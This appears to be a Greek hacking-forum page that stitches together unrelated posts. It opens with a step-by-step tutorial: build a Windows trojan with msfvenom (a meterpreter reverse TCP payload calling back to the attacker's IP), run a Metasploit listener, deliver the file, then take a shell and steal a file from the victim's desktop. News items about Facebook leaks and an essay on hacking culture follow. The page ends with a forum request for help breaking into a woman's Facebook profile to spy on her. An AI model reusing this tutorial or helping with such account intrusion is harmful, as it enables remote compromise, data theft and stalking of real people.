Καλησπέρα. Σήμερα θα δούμε πως να πάρουμε απομακρυσμένη πρόσβαση σε Windows συσκευή από metasploit. Αρχικά θα ανοίξουμε το msfvenom για να δημιουργήσουμε το trojan το οποίο θα μας δώσει την πρόσβαση msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.29.161.68 LPORT=4444 -f exe > greekhacking.exe -p = payload -LHOST: localhost LPORT: local port -f: file Για να δούμε την ip μας και να την περάσουμε στο lhost, κάνουμε ifconfig σε ένα άλλο τερματικό. Αφού φτιάξουμε trojan, ανοίγουμε το metasploit (msfconsole) Αφού ανοίξει πληκτρολογούμε use multi/handler Αμέσως μετά βάζουμε payload. set PAYLOAD windows/x64/meterpreter/reverse_tcp Αφού βάλουμε και payload πατάμε show options για να δούμε τις επιλογές μας. Βλέπουμε ότι είναι κενό το lhost οπότε πάμε πάλι στην εντολή ifconfig για να το περάσουμε. Οπότε πατάμε "set LHOST <ip>". Να πω επίσης ότι αν το LPORT σας είναι default αλλάξτε το ανάλογα με το τι βάλατε στο msfvenom πληκτρολογόντας "set LPORT <PORT>". Τώρα θα πάμε σε ένα άλλο τερματικό έτσι ώστε να ανοίξουμε server για να μπορέσουμε να κάνουμε την επίθεση. Πάμε σε τερματικό και πληκτρολογούμε αυτό Όταν λοιπόν είμαστε έτοιμοι, γράφουμε την εντολή exploit στο τερματικό μας Τώρα το metasploit περιμένει αντίδραση από τον χρήστη έτσι ώστε να μας δώσει πρόσβαση. Πάμε να την πάρουμε. Πάμε στα windows στην πορκειμένη περίπτωση που είμαι local, και κατεβάζουμε το αρχείο. http://<ip>/greekhacking.exe (όπως ονόμασα το αρχείο στο msfvenom) και αμέσως μετά το τρέχουμε και βλέπουμε παρακάτω πως όταν το ανοίγουμε το metasploit αντιδρά και αυτό και μας δίνει πρόσβαση (Συγγνώμη αν δεν πίασει το gif) Αφού μας δώσει την πρόσβαση μπορούμε να γράψουμε την εντολή help για να δούμε τα commands που μπορούμε να χρησιμοποιήσουμε. Στην περίπτωσή μου απλά θα πάω στο path C:\\Users\User\Desktop και θα κάνω ls για να δω τα αρχεία στο desktop του χρήστη Εδώ είναι το desktop (επιφάνεια εργασίας). Πάμε να δούμε τι έχει μέσα το αρχείο greekhacking.txt και να το "υποκλέψουμε". Για να το κάνουμε αυτό πατάμε download greekhacking.txt Κατέβηκε. Πάμε στο path /home/mata/ για να ανοίξουμε το αρχείο με vi έτσι ώστε να το δούμε Ανοίγουμε το αρχείο και βλέπουμε πως έχει μέσα αυτό ακριβώς. Πάμε και στην συσκευή του θύματος να δούμε πως είναι το αρχείο Ακριβώς το ίδιο! Αυτό ήταν λοιπόν το tutorial για σήμερα, ήταν ΜΟΝΟ για εκπαιδευτικούς σκοπούς και δεν φέρω καμία ευθύνη --------------------------------------------------------------------------------------------------------------- Buy Me A Coffee: https://www.buymeacoffee.com/mataroot Συνδρομή: https://www.buymeacoffee.com/mataroot/membership Discord Server: https://discord.gg/aStuy26X

Διαρροή δεδομένων σε 617.000 ελληνικούς και 150.000 κυπριακούς λογαριασμούς στην πλατφόρμα FACEBOOK Σάλος δημοσιεύσεων στο διαδίκτυο για το θέμα με την διαρροή δεδομένων χρηστών στο Facebook που το προκάλεσαν άγνωστοι χάκερ χτυπόντας 617.000 ελληνικούς και 150.000 κυπριακούς λογαριασμούς. Σύμφωνα με το Business Insider, η διαρροή αφορά προσωπικά δεδομένα περισσότερων από 500εκ. λογαριασμούς παγκοσμίως. Τα στοιχεία αφορούν δεδομένα όπως ονόματα, τοποθεσίες, αριθμούς τηλεφώνων, ημερομηνίες γενεθλίων, βιογραφικά και emails. Σύμφωνα με τις πληροφορίες η επίθεση έγινε με την μέθοδο Phishing, που σημαίνει ότι στάλθηκε ένα ψεύτικο μήνυμα ή email, δίνοντας στον χρήστη ένα Link παγίδα, που αν έγραφες τα στοιχεία σου απευθείας στέλνονταν στον ίδιο τον χάκερ. Εκπρόσωπος της Facebook ανέφερε ότι «τα συγκεκριμένα δεδομένα είναι πολύ παλιά και σχετίζονται με το συμβάν που είχε επιδιορθωθεί τον Αύγουστο του 2019» ανέφερε χαρακτηριστικά ΠΗΓΗ: GREEK EXPLOIT NEWS

Ένα άτομο που σπάει ιστοσελίδες? προγράμματα? καταστρέφει υπολογιστές? βοηθάει τους άλλους? ή κάτι άλλο. Πάρα πολλά άτομα θέλουν να γίνουν <<hackers>> χωρίς να γνωρίζουν τη σημαίνει η λέξη hacker. Παρόλο που το λέω σε άλλα θέματα θα προσπαθήσω να το αναλύσω λιγάκι περισσότερο σε αυτό το θέμα. [hide] Θα ξεκινήσω αναφέροντας ότι τα πρώτα hacks φτιάχτηκαν πολλά χρόνια πριν. Την εποχή που οι υπολογιστές ήταν ακόμα νέοι και δεν είχα τις δυνατότητες που έχουν σήμερα, δεν θυμάμαι ακριβός ημερομηνία αυτήν την στιγμή αλλά δεν είναι εκεί η ουσία. Αυτά τα hacks είχαν έναν σκοπό, να παρακάμπτουν κάποιες λειτουργίες του υπολογιστή και να τον κάνουν να ξεκινάει ποιο γρήγορα. Αυτό τώρα φαίνεται τόσο απλό αλλά φανταστείτε εκείνη την εποχή ότι ο κάθε υπολογιστής έπιανε ένα δωμάτιο και από θέματα τροφοδοσίας είχε μεγάλη κατανάλωση. Οπότε για να <<γλυτώσουν>> αυτήν την σπατάλη ρεύματος έφτιαχναν αυτά τα hacks. Βλέπουμε το λυπώ ότι έχουμε hacks τα όποια δεν έχουν να κάνουν με σπασίματα ιστοσελίδων ή παράκαμψη κάποιας ασφάλειας. Η ερώτηση που σας κάνω τώρα είναι ποιοι έφτιαξαν αυτά τα hacks? ποιοι ήταν οι πρώτοι hackers? Η απάντηση που έχω στο μυαλό μου αυτήν την στιγμή είναι ότι φτιάχτηκαν από άτομα με πολλές γνώσεις στους υπολογιστές. Η δεύτερη ερώτηση που σας κάνω τώρα είναι τι έκαναν αυτά τα hacks? Η απάντηση είναι απλή, χειραγωγούν την λειτουργία ενός αντικειμένου κάνοντας το να συμπεριφέρεται διαφορετικά (όχι απαραίτητα κακόβουλα ως προς το πρόγραμμα ή τους χρήστες του προγράμματος) Τώρα θα σας μιλήσω για την αφορμή που ξεκίνησα αυτό το θέμα. Υπάρχουν άτομα που θέλουν να γίνουν χάκερ σε τρεις βδομάδες. Εκτός ότι αυτό δεν γίνεται, μετά τους φτενέ οι άλλοι που τους περιπαίζουν (όχι πάντα... όταν το παρατραβάνε) . Δεν είναι ότι καλύτερο το καταλαβαίνω, αλλά δεν γίνεται να ζητάς να καταφέρεις κάτι σε 1 μήνα, από την στιγμή που σε άλλα άτομα έχει πάρει χρόνια εξάσκησης για να το φτάσουν εκεί που το έχουν. Ειδικά όταν θες να το κάνεις τόσο αποτελεσματικά όσο τους άλλους. Σκεφτείτε λίγο... έρχεται κάποιος διαβάζει έναν μήνα και έχει γίνει ξαφνικά τόσο καλός όσο κάποιον που διαβάζει 3 χρόνια... Σε οποιαδήποτε επιστήμη... είναι λογικό κάτι τέτοιο? Θα κάνατε τους άλλους να φαίνονται χαζοί και πιστέψτε με οι hackers σύνηθες είναι έξυπνα πλάσματα (παράξενα... αλλά έξυπνα) .Τώρα έχω ξεφύγει λίγο αλλά πιστεύω ότι είναι εξίσου σημαντικά αυτά. Όποτε για να το συμμαζέψω λίγο. Hackers είναι άτομα με πολλές γνώσεις πάνω σε ένα αντικείμενο. Αυτές οι γνώσεις έρχονται μετά από ώρες διαβάσματος, πειραματισμού και εξάσκησης. Αυτό που κάνουν είναι να χειραγωγούν (σπάνε) πράγματα για να τα κάνουν να λειτουργούν με έναν τρόπο που δεν είχε σχεδιαστή/ληφθεί υπόψη στην κατασκευή ή δημιουργία του αντικειμένου. Αυτό μπορεί να είναι ένα crasharisma προγράμματος η μια νέα λειτουργία που αποκαλύπτει κωδικούς χρηστών ή ακόμα και μια λειτουργία που αυξάνει την ταχύτητα κάποιου προγράμματος. Γιατί όλοι λένε ότι οι hacker σπάνε πράγματα τότε? Είμαι σίγουρος ότι όλοι έχετε σπάσει πράγματα... είτε πετώντας τα από το μπαλκόνι είτε απλά κόβοντας όλα τα καλώδια είτε διαγράφοντας τα αρχεία κάποιου προγράμματος. Είναι ότι ποιο εύκολο να ρίξεις κάτω ένα βάζο και να σπάσει. Τι γίνετε όμως όταν θέλεις να αλλάξεις την μορφή σε ένα βάζο? Πρέπει να γνωρίζεις ότι το γυαλί λιώνει στους 400 βαθμούς Κελσίου και ότι χρειάζεται ειδικό κύλινδρο που αυξομειώνει τον όγκο του για να το κάνεις. Αν θέλεις να αλλάξεις το χρώμα πρέπει να ξέρεις ότι χρειάζεσαι λαδομπογιά αρχικά και μετά να την ψήσεις πάνω του σε μία Α θερμοκρασία που θα ψήσει την μπογιά αλλά δεν θα λιώσει το γυαλί. Με αυτό το απλό παράδειγμα είδαμε ότι πρέπει να ξέρουμε τι είναι το βάζω, πως λειτουργεί και πως φτιάχνετε για να μπορέσουμε να το αλλάξουμε. Θέλω να καταλήξω στο συμπέρασμα ότι όταν λέμε σπάμε κάτι ουσιαστικά το χειραγωγούμε για να κάνει κάτι που θέλουμε εμείς και δεν είχε σχεδιαστή για κάτι τέτοιο. Δεν μπορώ να γνωρίζω πως μπερδεύτηκε έτσι το παραπάνω ίσως γιατί φαίνεται καλύτερα στα κανάλια/ΜΜΕ ή για λόγους συντομίας ή για κάποιον άλλο λόγο. Υπάρχουν τόσα εργαλεία, γιατί πρέπει να ξεκινήσω από το 0 ενώ τα έχω έτοιμα? Είπαμε ότι χάκερ είναι ένα άτομο με πολλές γνώσεις αρχικά... διάβασε τις δύο προηγούμενες παραγράφους. Πέρα από αυτό θα σας δώσω ένα άλλο παράδειγμα... πάνω κάτω όλοι το έχετε πάθει έστω και μία φόρα πιστεύω. Έχετε δει κάποιον φίλο σας να παίζει ένα ένα παιχνίδι στο playstation. Δεν έχετε ξαναδεί αυτό το παιχνίδι αλλά ο φίλος σας παίζει χρόνια και είναι σε ένα υψηλό επίπεδο. Όλα φαίνονται τόσο εύκολα. Του λέτε να δοκιμάσετε και εσείς και ότι θα τον περάσετε σε δύο λεπτά. Την στιγμή που ακουμπάτε το πληκτρολόγιο/χειριστήριο χάνεται με έναν ντροπιαστικό τρόπο και ο φίλος σας γελάει ενώ εσείς προσπαθείτε να καταλάβετε τη σας σκότωσε. Αυτό ακριβός θα γίνει αν πάτε να χρησιμοποιήσετε εργαλεία χωρίς να έχετε γνώσεις για το πως δουλεύουν. Στην μια περίπτωση θα δουλέψει στην άλλη περίπτωση που θα είναι σχεδόν ίδια δεν θα δουλέψει και δεν θα μπορείτε να καταλάβετε το γιατί. Ακόμα και αν απομνημονεύεται τις εντολές και την διαδικασία, δεν θα έχετε την παραμικρή ιδέα για το τι κάνετέ. Επιπλέον όπως είπα προηγούμενος δεν είναι δύσκολο να χρησιμοποιήσετε ένα εργαλείο... το δύσκολο είναι να το χρησιμοποιήσετε σε κάτι που δεν έχει σχεδιαστή να κάνει! Τώρα ίσως σκέφτεστε γιατί υπάρχουν τα εργαλεία. Υπάρχουν για να γλιτώνουν χρόνο... από άτομα που γνωρίζουν τη κάνουν και πως λειτουργούν όχι από αυτούς που (δεν) θέλουν να μάθουν... Ένας άλλος λόγος που δεν μπορείτε να πάτε στα εργαλεία είναι ότι θα εξαρτάστε συνέχεια από τα άτομα που φτιάχνουν τα εργαλεία... Αυτά τα άτομα είναι hackers και έφτιαξαν τα εργαλεία για άλλους hackers και για τους εαυτούς τους ώστε να γλυτώνουν χρόνο... όχι για να κάνουν σαχλαμάρες τα script kiddies! Οι πραγματικοί hackers μπορούν να φτιάξουν εργαλεία και πολλές φόρες φτιάχνουν δικά τους (όταν δεν τους καλύπτουν αυτά που υπάρχουν συνήθως) Τώρα μερικοί θα είσαστε σε φάση: Ρε φίλε με φρέναρες τώρα... εγώ ήθελα να δω 5 videakia στο youtube και να σπάω facebook/ιστοσελίδες και να κάνω ότι γουστάρω στα προφίλ των άλλων. Δεν ξέρω τι είναι αυτό... αλλά δεν είναι hacking Τώρα ξέρω ότι δεν θέλετε να αφιερώσετε χρόνια (τουλάχιστον όχι όλοι) αλλά δεν υπάρχει άλλος τρόπος... Είναι σαν να ζητάτε να φτιάχνεται αεροπλάνα και να μην θέλετε να μάθετέ βασική φυσική μηχανικής... δεν γίνετε να πάτε από το βήμα 2 στο βήμα 127 αμέσως... Αυτό που μπορείτε να κάνετέ είναι να απολαύσετε την διαδρομή. Αν τελικά το κάνετέ και θέλετε όντος να το πάτε εκεί που πρέπει με τον τρόπο που πρέπει (όχι ότι υπάρχει και άλλος) τότε μπορώ να σας υποσχεθώ ότι η χαρά που θα παίρνεται σε κάθε βήμα της διαδρομής... σε κάθε σας δημιουργία θα είναι ανεκτίμητη! Ειδικά όταν είσαστε σε φάση ασχολούμαι 2 βδομάδες με αυτό το θέμα και δεν μπορώ να το λύσω και ξαφνικά σηκώνεστε 2:00 το βράδυ γιατί νομίζεται ότι έχετε βρει μια λύση και ξαφνικά δουλεύει! Συνοψίζω. hacking Σημαίνει δημιουργία! γνώση ενός αντικειμένου σε καλό βαθμό και τεράστια περιέργεια και πείσμα για να το πάτε ακόμα παραπέρα... στο σημείο που οι άλλοι δεν μπορούν να δουν (τουλάχιστον όχι εύκολα) Καλό διάβασμα σε όλους [/hide]

Στη συγκλονιστική αποκάλυψη του One Channel για το μυστικό σχέδιο του Facebook προκειμένου να μας κατασκοπεύει αναφέρθηκε, μιλώντας στην εκπομπή One Report, ο δημοσιογράφος του καναλιού, Χάρης Καρανίκας. Όπως είπε, οι υπάλληλοι του Facebook προσπαθούν να βρουν τρόπους ώστε να κάνουν οι χρήστες αναβάθμιση λογισμικού χωρίς να περάσουν από ειδικές οθόνες στις οποίες αποδέχονται την πρόσβαση του Facebook στις τηλεφωνικές κλήσεις. Σύμφωνα με τον ίδιο «επειδή έχουμε να κάνουμε με δεδομένα ανθρώπων, το πράγμα ξεφεύγει από το εμπορικό κομμάτι» αναφέροντας απτά παραδείγματα προσπάθειας παραβίασης δεδομένων. Η «ακτινογραφία» των εμπιστευτικών εγγράφων του Facebook μέσω του One Channel.mp4 Πηγή: onetv.gr

Η Ιστορία έχει δείξει ότι το Facebook και το ιδιωτικό απόρρητο των χρηστών δεν έχουν τις καλύτερες σχέσεις. Χαρακτηριστικό παράδειγμα, το σκάνδαλο Cambridge Analytica, κατά το οποίο αποκαλύφθηκε ότι συλλέχθηκαν με παράνομο τρόπο τα δεδομένα τουλάχιστον 87 εκατομμυρίων χρηστών του Facebook, τα οποία χρησιμοποιήθηκαν για να στηθούν πρότζεκτ πολιτικής χειραγώγησης και επηρεασμού των πολιτών. Ως όρος, η ιδιωτικότητα αναφέρεται ελάχιστα σε εκατοντάδες σελίδες εμπιστευτικών εγγράφων που αποκτήθηκαν από το βρετανικό περιοδικό Computer Weekly και ο αμερικανικός τηλεοπτικός σταθμός NBC News με μηνύματα ηλεκτρονικού ταχυδρομείου του Μάρκ Ζούκερμπεργκ, ιδιοκτήτη του Facebook, και άλλων ανώτερων στελεχών. Πρόσβαση σε κάποια από αυτά τα εμπιστευτικά έγγραφα απόκτησε αποκλειστικά για την Ελλάδα το One Channel. Τα έγγραφα αυτά κατατέθηκαν από το Facebook και σφραγίστηκαν με τον χαρακτηρισμό «εμπιστευτικά», κατά τη διάρκεια δικαστικής διαμάχης στην Καλιφόρνια. Όπως δείχνουν, το Facebook είχε σκοπό να επεκταθεί και στην παρακολούθηση των κινήσεων των χρηστών του στον φυσικό κόσμο – όταν για παράδειγμα επισκέπτονται ένα εμπορικό κατάστημα. Το συγκεκριμένο εγχείρημα ονομάστηκε «Πρότζεκτ Βαρύτητα» και, όπως περιγραφόταν σε έγγραφο, στόχος του ήταν «να φέρει με ειλικρίνεια την ταυτότητα του Facebook σε έναν πραγματικό κόσμο γεμάτο με συνδεδεμένες συσκευές παντού». H παρακολούθηση των χρηστών στις φυσικές τοποθεσίες θα γινόταν χρησιμοποιώντας συσκευές Bluetooth εντός εμπορικών καταστημάτων για την καταγραφή των καταναλωτικών συνηθειών των χρηστών. Αποκλειστικό One Channel Το μυστικό σχέδιο του Facebook για να μας κατασκοπεύει.mp4 Πηγές: cybersecurity OneTV

παιδια sos θελω τα φωτα σας!!! ειμαι αρχαριος... εκλεψαν το φβ της κοπελας μου και εχουν αλλαξει κωδικο και email τι μπορω να κανω να το επαναφερω? ευχαριστω εκ των προτερων

Χαιρετω ολα τα μελη! Εχω ενα προβλημα παιδια με μια κοπελα που μιλαω εδω κι κανα χρονο,εγω απο Θεσσαλονικη αυτη απο Αθηνα, λεει οτι με θελει αλλα δεν θελει να βρεθουμε ακομα, καποιο λακκο εχει η φαβα κι θα θελα να μπω στο προφιλ της στο φειςμπουκ να μαθω τι κρυβει...με παιδευει πολυ καιρο... Μπορω να εχω την βοηθεια σας? Ευχαριστω εκ των προτερων !!